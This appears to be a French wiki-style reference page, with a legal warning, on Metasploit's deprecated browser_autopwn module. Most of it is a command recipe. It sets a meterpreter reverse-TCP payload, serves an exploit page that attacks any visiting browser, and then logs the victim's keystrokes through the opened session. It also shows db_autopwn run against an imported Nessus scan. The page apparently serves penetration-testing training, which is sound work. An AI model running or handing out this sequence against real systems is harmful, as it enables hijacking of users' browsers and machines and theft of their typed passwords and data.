Browser autopwn
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Exploitation navigateur automatisée |
| Module | auxiliary/server/browser_autopwn
|
| Statut | Déprécié |
| Contexte | Metasploit |
| Voir aussi | Aurora · Karmetasploit |
Browser Autopwn automatise l'exploitation à partir de scans de sécurité : le module sert une page qui teste plusieurs exploits contre le navigateur qui s'y connecte. Il est déprécié car susceptible d'endommager les systèmes scannés.
Usage
msfconsole
search autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.10.109
set URIPATH filetypes
exploit
La cible ouvre l'URL servie, puis on interagit avec la session obtenue :
# http://[adresse IP fournie]:8080
sessions -i 1
keyscan_start
keyscan_dump
Via la base et un rapport de scan
db_connect metasploit:toor@127.0.0.1/metasploitdb
db_import /tmp/nessus_report.nessus
db_autopwn -e -t -r -x -p